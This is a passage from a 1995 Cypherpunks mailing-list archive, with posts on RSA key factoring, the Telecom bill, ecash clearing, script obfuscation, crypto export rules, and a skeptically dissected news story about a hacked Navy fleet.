of the International Chamber of Commerce (ICC), the Business and Industry Advisory Committee to the OECD (BIAC), and information technology associations covering Europe, Canada, Japan, and the United States." "An ICC expert, Stefan Bernhard, said: `Just as government agencies are obliged to seek court warrants before making physical searches within a company, or in the home of a private person, the same restrictions should apply on the information superhighway.'" "For further information contact Lionel Walsh at the ICC communications division (33 1) 49 53 28 23. Email - ICCOM at ibnet.com" -Futplex From weidai at eskimo.com Thu Dec 21 15:11:04 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 21 Dec 95 15:11:04 PST Subject: What ever happened to... Cray Comp/NSA co-development In-Reply-To: Message-ID: tcmay at got.net wrote: > Not in cracking "truly large" problems by brute force. Even if each of the > million processors is capable of 100 MIPS (which is unlikely, given the PIM > approach and the fine-granularity, few-bit-or-less word size, etc.), this > is only 10^8 MIPS. For problems that (for instance) 10^75 machines would > have to spend 10^10 years on, not even a drop in an ocean. The problem is there are still people and organizations that use 512-bit RSA keys. The DOE recentedly awarded Intel a contract to build a computer with 9072 Pentium Pro processors. I doubt that it will be used for factoring keys, but if it were, it will be able to factor a 512-bit number in a matter of months. The boundary delimiting "truly large" problems and merely extremely expensive ones inches up all the time. Less than a decade ago people thought factoring RSA-129 was a "truly large" problem. Wei Dai From EALLENSMITH at mbcl.rutgers.edu Thu Dec 21 15:14:28 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Thu, 21 Dec 95 15:14:28 PST Subject: Telcom bill report Message-ID: <01HZ2U34JNWW8Y53CL@mbcl.rutgers.edu> Here's the additional info from Reuters. As usual, Clinton is being a coward. For additional Cypherpunks relevance, anonymous remailer operators in the US may need to watch out. -Allen Reuters New Media _ Thursday December 21 2:11 PM EST _ Congress Reaches Compromise On Telecom Reform WASHINGTON - Congressional conferees have agreed to a sweeping reform of telecommunications law that would open competition by allowing the telephone, cable and broadcast industries to invade the others' turf. Vice President Gore says President Clinton will sign the bill. Before the agreement, the president had been threatening for months to veto the bill if Republicans in Congress did not retreat on a long list of issues. They retreated. Vice President Al Gore said "This will unleash a new era in the telecommunications revolution and speed completion of the information highway." The bill would also impose tough new restrictions on sexual material on online services. It has been bitterly opposed by civil rights groups who say the controls on sexual content constitute censorship. The legislation would impose fines of up to $100,000 and prison terms of up to two years on people who make "indecent" material available to minors over computer networks. That could pose big problems for companies that provide online information services. The "cyberporn" issue was championed by conservative religious groups, including the Christian Coalition, and is certain to provoke a new courtroom battle over Constitutional rights to free speech. From jya at pipeline.com Thu Dec 21 15:32:53 1995 From: jya at pipeline.com (John Young) Date: Thu, 21 Dec 95 15:32:53 PST Subject: Telcom bill report Message-ID: <199512212332.SAA13156@pipe2.nyc.pipeline.com> Responding to msg by EALLENSMITH at ocelot.Rutgers.EDU ("E. ALLEN SMITH") on Thu, 21 Dec 6:12 PM > The "cyberporn" issue was championed by conservative > religious groups, including the Christian Coalition, and is certain to > provoke a new courtroom battle over Constitutional rights to free > speech. In the NYT the sentence above was followed by: "Indeed, the measure includes a provision that requires a Federal court in Washington to take up the issue almost as soon as someone challenges its legality." From futplex at pseudonym.com Thu Dec 21 16:12:06 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 21 Dec 95 16:12:06 PST Subject: Telcom bill report In-Reply-To: <01HZ2U34JNWW8Y53CL@mbcl.rutgers.edu> Message-ID: <199512220011.TAA15741@thor.cs.umass.edu> > The legislation would impose fines of up to $100,000 and prison terms > of up to two years on people who make "indecent" material > available to minors over computer networks. That could pose big > problems for companies that provide online information services. Perhaps my memory is faulty, but it seems to me that the wording of this part of the bill (S.652) has been amended a bit. Sec. 402 of 652 now amends Section 223 (47 U.S.C. 223) subsection (a) to fine or imprison whoever "knowingly permits any telecommunications facility under his control to be used for any activity prohibited by paragraph (1) [indecent communication with intent to annoy blah blah] with the intent that it be used for such activity". (this is from the "House Appropriation Bill as Passed by the Senate" version of S.652 on http://thomas.loc.gov) This (new, I think) part requiring "intent that it be used for such activity" looks like an enormous loophole to me. I can't think of many people who provide communications services _with the intent that they be used to harass [etc.] others with obscene [etc.] communications_. Could a lawyer comment on why intent would be easier to establish than I believe offhand ? -Futplex From fricke at mae.engr.ucdavis.edu Thu Dec 21 16:52:17 1995 From: fricke at mae.engr.ucdavis.edu (Light Ray) Date: Thu, 21 Dec 95 16:52:17 PST Subject: The Problem With Blaze And Weinstein In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org> Message-ID: On Thu, 21 Dec 1995, ECafe Anonymous Remailer wrote: > ATT and Netscape are both tools of the CIA/NSA. > Blaze and Weinstein are in on the > plot to force GAK upon us. Neither one > says enough about the evils of GAK on their > web page, so they're obviously for GAK and > only pretending to be against it to fool > the cypherpunks and curry favor with their NSA > masters. Hmm. You don't happen to be a conspiracy theorist, do you? Tobin Fricke From ericm at lne.com Thu Dec 21 17:21:39 1995 From: ericm at lne.com (Eric Murray) Date: Thu, 21 Dec 95 17:21:39 PST Subject: GAK boycott, What are legal implications? In-Reply-To: <30d9ca78.flight@flight.hrnowl.lonestar.org> Message-ID: <199512220119.RAA23373@slack.lne.com> > Here is a question for all of you cyber legal types out there. > This question presupposes: > > The NIST will complete its work on the GAK standard. But no law will be > passed (yet) regulating the use of encryption in the U. S. (The GAK standard > is an attempt to create an environment in which such laws can be passed.) > In the U.S., Big Company INC will start marketing a GAKed encryption > product domesticly. > > A bunch of cypherpunkish types will immediately try to organize a boycott > against BIG COMPANY. I think it's more likely that a group of people will work on breaking Big Co's GAKed product. Either finding a flaw in it's algorithm or protocol that can be exploited, or a flaw that renders it's GAK unusable, i.e. Matt Blaze's LEAF hack on Clipper. > What are the cypherpunks legal risks? > > I seem to remember that back in the 70s, the NAACP lost a big case >with respect to their boycott in a southern city. As I recall there were people > in the street begging money for the NAACP because there was a > 10**6 $ > judgement against the NAACP and they needed that much just to appeal. Well, NAACP is an actual organization with papers filed with the IRS, officers or some sort of board members, offices, etc. Cypherpunks is just a mailing list, and many of the members of the list don't use their real identies on the list. Who would they go after? -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From fricke at mae.engr.ucdavis.edu Thu Dec 21 17:50:02 1995 From: fricke at mae.engr.ucdavis.edu (Light Ray) Date: Thu, 21 Dec 95 17:50:02 PST Subject: Microsoft Flame[tm] [NOISE] In-Reply-To: Message-ID: On Thu, 21 Dec 1995, jim bell wrote: > Well, I disagree. Microsoft succeeded primarily because it was "chosen" by > IBM in about 1981 or so, needing an OS for their PC. MS didn't even write > it; Seattle Computer did, and that was a port of CP/M. Not much creativity. > MSDOS revisions 1.0 and 1.1 were pure crap. I'm sure that's true to a large extent. However, although I may be wrong, I beleive that MS's primary reason for initial success was in MS BASIC. They needed a new OS to go with BASIC, so they used DOS. They needed a new filesystem to store BASIC files, and thus FAT was born. Tobin Fricke From nobody at REPLAY.COM Thu Dec 21 18:20:40 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 21 Dec 95 18:20:40 PST Subject: Alta Vista caches queries Message-ID: <199512220220.DAA27203@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Here's one more reason to worry about the implications of web search engines: I just stopped in on Digital's new Alta Vista page, and was surprised to find that the query field was filled in--with a search I ran 3 or 4 days ago. I doublechecked my end pretty thoroughly (scrubbing all the files that Netscape 2.0b3 [Mac] generates--caches, global history, etc., and eventually reinstaling Netscape from scratch). And it look an awful lot like Alta Vista cached by query according to my IP address. Maybe dynamically assigned IPs ain't such a bad idea after all... Hieronymous -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMNoVRb3g0mNE55u1AQEWxAIAiknajMTLiPzKxl4Wz3hoJsE4ntsXQJiV zNoz9LAW16+7+oFKKPwcjQCTi7heMstT9dP0GjCHmYuCl2cFcmQRbQ== =HQ12 -----END PGP SIGNATURE----- From floyddb at alpha.c2.org Thu Dec 21 19:07:52 1995 From: floyddb at alpha.c2.org (floyddb at alpha.c2.org) Date: Thu, 21 Dec 95 19:07:52 PST Subject: No Subject Message-ID: <199512220241.SAA14531@infinity.c2.org> andr0id at midwest.net (Jason Rentz) wrote: >> >>Whats the current thinking on the security level of 900Mhz digital spread >>sectrum cordless phones? Clearly it's not a basic scanner job but how much >>more equipment is needed to monitor one ? > >Well when you listen into a spread spectrum conversation what you will hear >is open squelch white noise. The spread spectrum radios that I know about >send information on several deffrent frequencies throughout the >conversation. [snip] > Dr0id > > >( Computer Consulting & Management ) >(P.O. Box 421 Cambria, IL 62915-0421) > [snip] There is a company called Optoelectronics that markets a radio reciever called the Interceptor. This is a broad band (several hundred MHz) device designed to lock on to the most powerful signal around, regardless of frequency. As supplied, it only has a rubber duck antenna, but a broadband, directional antenna (Log Periodic?) could be attached. There are AM and FM versions that output audio and a version called the Scout that controls a scanner. These could have outboard devices hung on to them to decode digital signals, record the conversation ... all for less than $1000. Floyd D. Barber floyddb at alpha.c2.org Key fingerprint: 8A 98 1F 6B 70 7A FE 24 35 D4 48 CF 9D F6 B0 91 PS Sameer, thanks for the nym. From beavis at bioanalytical.com Thu Dec 21 19:59:25 1995 From: beavis at bioanalytical.com (Beavis B. Thoopit) Date: Thu, 21 Dec 95 19:59:25 PST Subject: ex encrypted script In-Reply-To: <199512212047.OAA19022@cdale1.midwest.net> Message-ID: <199512220357.WAA02638@bioanalytical.com> > >| Is there a way to encrypt a script yet still allow it to be runnable? I > >| know that the simple answer is to write it in C and compile it but I don't > >| have the means of doing that at the moment. (i.e. there is not compiler on > >| the system) > >| > >| I thought of a few simple protections but they all involve decrypting before > >| running. > > > > Ever hear of chmod? chown? > >Adam > > The vendor also has superuser access.. chmod chown won't protect it.. :( I once had to obfuscate an awk script. "Cryptography is Economics." My job was to make it difficult for the enemy to steal the source. There was a license agreement... The simple answer of "no" is right in the strong sense, but there are tricks to make life difficult for the amateur attacker. My approach was a self-decrypting program. The "real" script was encrypted within the body of the encasing script. For increased obfuscation, decrypt only small pieces at a time. From pati at ipied.tu.ac.th Thu Dec 21 20:23:01 1995 From: pati at ipied.tu.ac.th (Patiwat Panurach) Date: Thu, 21 Dec 95 20:23:01 PST Subject: [ecash] Re: Multi-issuer questions In-Reply-To: <199512191429.PAA01228@digicash.com> Message-ID: On Tue, 19 Dec 1995, Marcel van der Peijl wrote in the ecash mailing list: > Q: If user A signs up with bank A, and merchant B signs up with bank B, > can user A buy at merchant B? > > A: In theory: > > Bank A and bank B need to have an interbank clearing agreement. User > A sends his money to merchant B. Merchant B contacts his own bank, > bank B. Bank B recognizes the money as being issued at bank A, > contacts bank A, and clears the coins there. Bank A credits bank B's > account at bank A, bank B sends an acknowledge to merchant B and > merchant B sends the goods to user A. I dispute this even on theoretical grounds. Am I right in assuming that the only reason Bank B has in contacting Bank A is to confirm that the ecash hasn't been double spent? Once that is confirmed, there should be no need for contact between the two banks. Bank A should not have to credit Bank B's account as there has been no transfer from Bank A to Bank B. The transfer has been the deposit from Bank B's customer to Bank B. Bank B is allready "credited", i.e., its (e)cash researves have increased, the moment Bank A confirms that the ecash is valid. But this also makes a second assumption: that ecash is truly an open standard, i.e., that ecash is a "widely acceptable means of payment." Any ecash issuing bank must be obligated to accept customer ecash deposits with one and only one condition: that the originally issuing bank must validate it. Now what if this weren't so? What if Bank B said "I didn't originally issue this ecash and thus, I wont accept its deposit." Now this puts the "cashness" of ecash into some jeopardy. It doesn't immediately make ecash useless, but it puts an auxiliary condition to it. This concerns the difference between Validation and Acceptance. Validation is when Bank B checks the ecash with its original issuer to see if it has been double spent. Acceptance is actually accepting that ecash as a deposit. If Bank B refuses to Validate any non-Bank-B ecash then ecash pretty much fails. Period. How would Bank B's customer be able to handle commerce with non-Bank-B buyers? By having multiple accounts with multiple Banks? What if the number of ecash issuers mushrooms into the hundreds? In anology, would you want to have to have accounts in 500 banks if your customers also used 500 different banks? The other alternitive for the ecash case would be if Bank-B's-customer could bypass Bank-B by validating the ecash directly with Bank A. If it passes, then he must now look at the matter of Acceptance. Now Bank-B's-customer knows that the ecash is valid. He keeps it temporarily in his hard disk. But will Bank B ever Accept it as a deposit? If it doesn't, then Bank-B's-customer needn't worry that much. He can just use that ecash for transactions purpases. Just because you can't deposit every cent of cash that you earn doesn't mean that your cash is worthless. The fundamental test of ecash is whether merchants/customer will accept it. Of course, there is also important value in checking if Banks will accept deposits of it, but I consider that secondary. So some concluding topics include: + independant verification of ecash. some formal system for ecash merchants (sellers) to check directly with the issuing bank that the ecash hasn't been double spent. OR + interbank verification of ecash. formal interbank system for the cleints bank to check the issuing bank to see if the ecash hasn't been double spent. AND + interbank acceptance of ecash. formal acceptance of verified ecash deposits, no matter the issuing bank. The type of verification doesn't really matter that much. Some sort of distributed method of resolving ecash issuers has to be standardized (say like the DNS, each ecash coin has some information as to the issuer. person/bank that wants to verify just transmits that ecash to its original issuer and then receives a reply saying: verified (usable) or not (double spent). The interbank acceptance issue is more important, but digicash (the company) has some power here. If they really aim at ecash beeing true cash (instead of checking), then they gotta force all issuing banks to accept ecash deposits nomatter the original issuer. Like the Real Life cash system: all banks accept cash, even though it is the federal researve that was the original issuer. ------------------------------------------------------------------------------- Patiwat Panurach Whatever you can do, or dream you can, begin it. eMAIL: pati at ipied.tu.ac.th Boldness has genius, power and magic in it. m/18 junior Fac of Economics -Johann W.Von Goethe ------------------------------------------------------------------------------- From jpp at software.net Thu Dec 21 20:58:29 1995 From: jpp at software.net (John Pettitt) Date: Thu, 21 Dec 95 20:58:29 PST Subject: ex encrypted script Message-ID: <199512220457.UAA05102@software.net> At 10:57 PM 12/21/95 -0500, Beavis B. Thoopit wrote: >> >| Is there a way to encrypt a script yet still allow it to be runnable? I >> >| know that the simple answer is to write it in C and compile it but I don't >> >| have the means of doing that at the moment. (i.e. there is not compiler on >> >| the system) >> >| >> >| I thought of a few simple protections but they all involve decrypting before >> >| running. >> > >> > Ever hear of chmod? chown? >> >Adam >> >> The vendor also has superuser access.. chmod chown won't protect it.. :( > >I once had to obfuscate an awk script. "Cryptography is Economics." My >job was to make it difficult for the enemy to steal the source. There >was a license agreement... > >The simple answer of "no" is right in the strong sense, but there are >tricks to make life difficult for the amateur attacker. > >My approach was a self-decrypting program. The "real" script was >encrypted within the body of the encasing script. For increased >obfuscation, decrypt only small pieces at a time. > > There is encrypt and then there is render useless to the reader. A tale I hear is that when HP had to deliver operating system source to the french government they stripped all comments and changed all variable and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O). It still compiled but was 100% useless to human readers. -- John Pettitt email: jpettitt at well.sf.ca.us (home) jpp at software.net (work) From Bill.Humphries at msn.fullfeed.com Thu Dec 21 21:01:30 1995 From: Bill.Humphries at msn.fullfeed.com (Bill Humphries) Date: Thu, 21 Dec 95 21:01:30 PST Subject: Newsweek Nerd 50 Message-ID: Okay, while you other cypherpunks were grousing about how you weren't going to give Newsweek your hard-earned currency, I bought a copy. My pain, your gain (on a significantly smaller scale than that messiah figure some of us celebrate next week.) Cypherpunk Notables on the List: "Newsweek's Epithet" Phil Zimmerman: "Crypto Creator" Marc Rotenberg: "Privacy Advocate" Sameer Parekh: "Protector of Privacy" Johan Helsingius: "Crusader" and Steven Levy, who sometimes posts here has the byline on the "Year of the Net" feature. PS to Newsweek -- Prof. Hoffman should be called a "Data Goddess" not a "Geek" for exposing those bogus factors the marketdroids want to use to control their survey data back up to the population level. Happy Holidays Piss off Ralph Reed, Defend the 1st Amendment. Bill Humphries From jlasser at rwd.goucher.edu Thu Dec 21 21:27:23 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 21 Dec 95 21:27:23 PST Subject: CFS and Linux In-Reply-To: <199512201915.UAA00215@asylum.berserk.com> Message-ID: On Wed, 20 Dec 1995, Alex de Joode wrote: > Is there anyone out there that has CFS running with Linux ? > > It installs fine on BSDi 2.0 but I'm unable to install it > under Linux, I would appreciate it if some one would help > me out. I've got it running fine under Linux. To do this, you have to do several things: (1) Use RPC with the 'old style file' option, whatever that is... (2) Edit out the _'s from the RPC-generated files (3) Use the modified make command included in the README. I, for one, hope that Matt Blaze fixes (or at least automates :)) these quirks in the new version due out RSN... Jon Lasser ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From jeffg at HiWAAY.net Thu Dec 21 21:29:10 1995 From: jeffg at HiWAAY.net (Jeff Gehlbach) Date: Thu, 21 Dec 95 21:29:10 PST Subject: ex encrypted script Message-ID: <9512220528.AA24323@fly.HiWAAY.net> -----BEGIN PGP SIGNED MESSAGE----- At 02:47 PM 12/21/95 -0600, you wrote: >>| Is there a way to encrypt a script yet still allow it to be runnable? I >>| know that the simple answer is to write it in C and compile it but I don't >>| have the means of doing that at the moment. (i.e. there is not compiler on >>| the system) >>| >>| I thought of a few simple protections but they all involve decrypting before >>| running. >> >> Ever hear of chmod? chown? >>Adam > >The vendor also has superuser access.. chmod chown won't protect it.. :( Because I am treading in unfamiliar waters, I will just throw this one on the table, leaving the discussion to the big boys. Have you considered sudo? I really am not familiar with its capabilities, so easy with the flames :^> -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNpB5Y8AYvAI/GnhAQFx5gP/Ue+KaBLC7gOkH6qFEBKvrKIyvsmObUWU fvJv59OW4hY+/hCFfqvio3+7wQhwgImin7uEU3gIz+O5hLBRnjhknCqqdmxVPH1F XuwJSrSdmuLxyRgrSeSc/b2f93Mvu+2cD8VQb0h6QBwe7vfTFNwMqwfcS0a76r2x lC8IOMH88K8= =cIYu -----END PGP SIGNATURE----- -----BEGIN PGP SIGNED MESSAGE----- At 02:47 PM 12/21/95 -0600, you wrote: >>| Is there a way to encrypt a script yet still allow it to be runnable? I >>| know that the simple answer is to write it in C and compile it but I don't >>| have the means of doing that at the moment. (i.e. there is not compiler on >>| the system) >>| >>| I thought of a few simple protections but they all involve decrypting before >>| running. >> >> Ever hear of chmod? chown? >>Adam > >The vendor also has superuser access.. chmod chown won't protect it.. :( Because I am treading in unfamiliar waters, I will just throw this one on the table, leaving the discussion to the big boys. Have you considered sudo? I really am not familiar with its capabilities, so easy with the flames :^> -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNpB5Y8AYvAI/GnhAQFx5gP/Ue+KaBLC7gOkH6qFEBKvrKIyvsmObUWU fvJv59OW4hY+/hCFfqvio3+7wQhwgImin7uEU3gIz+O5hLBRnjhknCqqdmxVPH1F XuwJSrSdmuLxyRgrSeSc/b2f93Mvu+2cD8VQb0h6QBwe7vfTFNwMqwfcS0a76r2x lC8IOMH88K8= =cIYu -----END PGP SIGNATURE----- ---========--- Finger for PGP key & Geek Code * No lemurs were harmed creating this sig. "The significant problems we face cannot be solved at the same level of thinking we were at when we created them." - Albert Einstein From chen at best.com Thu Dec 21 21:37:39 1995 From: chen at best.com (Mark Chen) Date: Thu, 21 Dec 95 21:37:39 PST Subject: FWD: Intuit and SSNs In-Reply-To: <199512211706.SAA10738@utopia.hacktic.nl> Message-ID: <199512220537.VAA11469@shellx.best.com> > What does our man in Intuit have to say about this? Well, the check-writing business does not really fall within my purview, but I'll see if the report is true. Pretty idiotic, if so. - Mark - -- Mark Chen chen at intuit.com 415/944-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From jeffg at HiWAAY.net Thu Dec 21 21:48:10 1995 From: jeffg at HiWAAY.net (Jeff Gehlbach) Date: Thu, 21 Dec 95 21:48:10 PST Subject: Remote use=export? Message-ID: <9512220547.AA27294@fly.HiWAAY.net> -----BEGIN PGP SIGNED MESSAGE----- I apologize if this is a dead horse, but... Is granting use of crypto software running in the US to a remote user outside the US considered exportation? For example, if allow my friend in Paris to use a PGP binary residing and running on my PC in Washington, is either of us violating any ITAR or similar restrictions? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNpGc48AYvAI/GnhAQHJnAQAxzOPDbj5dzy6Xu/45h+nipatGBgw7tvP +kcHUypA+oMmx1tBuCEz3UjpWIBCY5Nf5LD1sNToHGXJdHtLHG1t7coes8jFHRfL 8mVJNMckuPxwv5rLSVR6i5kWqvaz9UYsEpdjR2tROmyKCEHwNC+yy1OfRP1F65xi nEjvksPjv/U= =DIg7 -----END PGP SIGNATURE----- ---========--- Finger for PGP key & Geek Code * No lemurs were harmed creating this sig. "The significant problems we face cannot be solved at the same level of thinking we were at when we created them." - Albert Einstein From jlasser at rwd.goucher.edu Thu Dec 21 21:56:30 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 21 Dec 95 21:56:30 PST Subject: on web standards: sent to Markoff In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com> Message-ID: On Wed, 20 Dec 1995, Vladimir Z. Nuri wrote: > there's been MS flamewars on this list before, but Attila repeats > various snippets that I find highly objectionable. > > cpunk relevance: operation of the free market *sigh* "operation of the free market" isn't necessarily cypherpunk-relevant, unless of course all libertarianism is. I, for one, consider myself a cpherpunk, and not necessarily 100% behind free markets. (I'm still thinking about it.) In short, can this *please* move off list? Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From Alan.Pugh at internetMCI.COM Thu Dec 21 22:16:47 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Thu, 21 Dec 95 22:16:47 PST Subject: Encryption Rules Coming Message-ID: <01HZ38W9ELSI95NNMH@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- > Encryption rules to be prepared > By Andrew Jack in Paris =snip= > Highly sophisticated encryption technology already exists > in a number of countries including the US and Sweden. In > the US, companies already have access to these programs. A > growing number of businesses -- led by the banking sector > -- are demanding access to these programs. ya know, if we could beat the following (true) statement into the heads of the people who write this stuff, it would go far towards making people understand how futile it is to try to stop the spread of encryption technology. "Highly sophisticated encryption technology already exists in every country on the planet. Anyone with a modem and access to the internet has access to these programs. The fact is that a very powerful encryption program can actually be written by hand on a postcard and mailed anywhere in the world." i want to rant more on this but will spare the choir of this. is anyone out there marketing "rsa in 3 lines of pearl" as a postcard? i'm going to have it printed on a business card so i can hand them out to demonstrate the foolishness of itar in my own way. amp <0003701548 at mcimail.com> (since 10/31/88) PGP Key = 57957C9D PGP FP = FA 02 84 7D 82 57 78 E4 E2 1C 7B 88 62 A6 F9 F7 December 22, 1995 0:45 From jim at bilbo.suite.com Thu Dec 21 22:49:28 1995 From: jim at bilbo.suite.com (Jim Miller) Date: Thu, 21 Dec 95 22:49:28 PST Subject: Attacking Clipper with timing info? Message-ID: <9512220648.AA17385@bilbo.suite.com> > I suppose the correct answer is, "It depends." > > It depends on your definition of "should" in the above > paragraph. If "should" means "in keeping with the NSA's > mission statement", then I believe the NSA should remain > quite and exploit the vulnerability as a national > technical asset. If "should" means "in support of US > commerce", then the answer would be that they should > announce/fix the vulnerability. > > I'm not sure from your tone which one you believe to be the > correct definition. :-) > I don't know myself. That's why I still occasionally think about it. It is sometimes comforting to think there is a US agency with the expertise of the NSA. At other times I wonder if we're getting the most for our tax money. Unfortunately, it would be impossible to generate a meaningful cost/benefit analysis even if the NSA was not a secret agency. Of course, if we did not pax taxes there would be no need to wonder if we're getting our money's worth. A self-funded,for-profit NSA? Now there's a liberatarian idea if I ever heard one. Jim_Miller at suite.com From stevenw at best.com Thu Dec 21 23:20:20 1995 From: stevenw at best.com (Steven Weller) Date: Thu, 21 Dec 95 23:20:20 PST Subject: ex encrypted script Message-ID: >At 10:57 PM 12/21/95 -0500, Beavis B. Thoopit wrote: >>> >| Is there a way to encrypt a script yet still allow it to be runnable? I >>> >| know that the simple answer is to write it in C and compile it but I >>>don't >>> >| have the means of doing that at the moment. (i.e. there is not >compiler on >>> >| the system) >>> >| >>> >| I thought of a few simple protections but they all involve decrypting >before >>> >| running. >>> > >>> > Ever hear of chmod? chown? >>> >Adam >>> >>> The vendor also has superuser access.. chmod chown won't protect it.. :( >> >>I once had to obfuscate an awk script. "Cryptography is Economics." My >>job was to make it difficult for the enemy to steal the source. There >>was a license agreement... >> >>The simple answer of "no" is right in the strong sense, but there are >>tricks to make life difficult for the amateur attacker. >> >>My approach was a self-decrypting program. The "real" script was >>encrypted within the body of the encasing script. For increased >>obfuscation, decrypt only small pieces at a time. >> >> >There is encrypt and then there is render useless to the reader. > >A tale I hear is that when HP had to deliver operating system source to >the french government they stripped all comments and changed all variable >and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O). >It still compiled but was 100% useless to human readers. There is a commercial product out there from Gimpel Software called _The C Shroud_. It removes all structure from the code, replacing it with gotos, renames all the symbols to axxxxxxx, converts constants and strings to hex, substitutes all #defines and expands all macros, strips all formatting and comments, etc., resulting in a perfectly compilable, but infuriatingly obfuscated set of source files. ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more | than just a place to find pictures | of people having sex with dogs." stevenw at best.com | -- Time Magazine, 3 July 1995 From fricke at mae.engr.ucdavis.edu Fri Dec 22 00:00:39 1995 From: fricke at mae.engr.ucdavis.edu (Light Ray) Date: Fri, 22 Dec 95 00:00:39 PST Subject: Air Force hacks Navy? Eeeek! Message-ID: Read this. It's from the Electronic Telegraph, a neat web site in the UK. This article was later posted to comp.risks, and hence, Risks Forum digest, which is where I found it. The paragraphs have been numbered for easy reference. ---------------------------------------------------------------------------- (paragraph 0) http://www.telegraph.co.uk/et/ (paragraph 1) A few clicks and then the e-mail message entered the ship's control system... War of the microchips: the day a hacker seized control of a US battleship (paragraph 2) BY SIMPLY dialing the Internet and entering some well-judged keystrokes, a young US air force captain opened a potentially devastating new era in warfare in a secret experiment conducted late last September. His target was no less than gaining unauthorised control of the US Navy's Atlantic Fleet. (paragraph 3) Watching Pentagon VIPs were sceptical as the young officer attempted to do something that the old Soviet Union had long tried to do and failed. He was going to enter the very heart of the United States Navy's warships - their command and control systems. (paragraph 4) He was armed with nothing other than a shop-bought computer and modem. He had no special insider knowledge but was known to be a computer whizzkid, just like the people the Pentagon most want to keep out. (paragraph 5) As he connected with the local node of the Internet provider, the silence was tangible. The next few seconds would be vital. Would the world's most powerful navy be in a position to stop him? (paragraph 6) A few clicks and whirrs were the only signs of activity. And then a seemingly simple e-mail message entered the target ship's computer system. (paragraph 7) First there was jubilation, then horror, back on dry land in the control room at the Electronic Systems Centre at Hanscom Air Force Base in Massachusetts. Within a few seconds the computer screen announced "Control is complete." (paragraph 8) Out at sea, the Captain had no idea that command of his multi-million-dollar warship had passed to another. One by one, more targeted ships surrendered control as the codes buried in the e-mail message multiplied inside the ships' computers. A whole naval battle group was, in effect, being run down a phone-line. Fortunately, this invader was benevolent. But if he could do it ... (paragraph 9) Only very senior naval commanders were in the know as the "Joint Warrior" exercise, a number of experiments to test defence systems, unfolded between September 18-25. Taking over the warships was the swiftest and most alarming of the electronic "raids" - and a true shock for US military leaders. "This shows we have a long way to go in protecting our information systems," said a senior executive at the airbase where the experiment was conducted. (paragraph 10) The exact method of entry remains a classified secret. But the Pentagon wanted to the first to test the extent of their vulnerability to the new "cyberwarriors" - and had the confidence to admit it. (paragraph 11) Now they believe they know what they are dealing with and the defences are going up. (paragraph 12) Reply to Electronic Telegraph - et at telegraph.co.uk Electronic Telegraph is a Registered Service Mark of The Telegraph plc -------------------------------------------------------------------------- This sounds very fantastic, like the plot of a movie. Indeed, _Hackers_ featured a "worm" that took over control of the ballast of oil tankers. Perhaps this is a case of a journalist being a good writer but not fully understanding the topic at hand. Does anyone know how true this article is? Or where we could find more info? If it is true, then this is almost scary. Let's pick the article apart: In paragraph (1), the author refers to "the day a hacker siezed control over a US battleship." I assume that "hacker" and "battleship" are being used loosely, as, as noted in an IW-list posting that I received a few minutes ago, there are no currently active US battleships. (?) In paragraphs (2) and (5), the author refers to the "hacker" "dialing the internet" and "[he] connected with the local node of the Internet provider." This implies that the whole operation was conducted over the internet. Do battleships even have internet connections? They may. But the military certainly wouldn't dialup through a civilian ISP where their data goes through unknown hands to perform a very secret operation. Everything is doubtlessly encrypted - was the attack performed with or without keys? Or was the crypto somehow bypassed? The intruder is referred to as "young US air force captain" in par 2, a "young officer" in par 3, a "computer whizzkid" in par 4, an "invader" in par 8, and a "cyberwarrior" in par 10. Who was he? I would assume that it was more likely a group of people who were "in the know." Even the average "Joe Hacker" (is there such a thing?) would have trouble controlling a "batteship" let alone through an ASCII connection. In par 2, the author states that the intruder was attempting to gain "unauthorised control of the US Navy's Atlantic Fleet" (sic). If these were indeed "Joint Warrior" experiments, then it would be authorized. Throughout the article, references are made to the attack beginning with "a simple email message." This could be possible, but it seems that a higher means of control would be necessary. Anyhow, the whole article seems factually incorrect. I'm very interested in finding out more on what ACTUALLY happened, tho.. Tobin Fricke fricke at roboben.engr.ucdavis.edu From fc at all.net Fri Dec 22 03:51:43 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 22 Dec 95 03:51:43 PST Subject: ex encrypted script In-Reply-To: <199512220357.WAA02638@bioanalytical.com> Message-ID: <9512221147.AA06064@all.net> > > >| Is there a way to encrypt a script yet still allow it to be runnable? I > > >| know that the simple answer is to write it in C and compile it but I don't > > >| have the means of doing that at the moment. (i.e. there is not compiler on > > >| the system) > > >| > > >| I thought of a few simple protections but they all involve decrypting before > > >| running. > > I once had to obfuscate an awk script. "Cryptography is Economics." My > job was to make it difficult for the enemy to steal the source. There > was a license agreement... > > The simple answer of "no" is right in the strong sense, but there are > tricks to make life difficult for the amateur attacker. > > My approach was a self-decrypting program. The "real" script was > encrypted within the body of the encasing script. For increased > obfuscation, decrypt only small pieces at a time. There 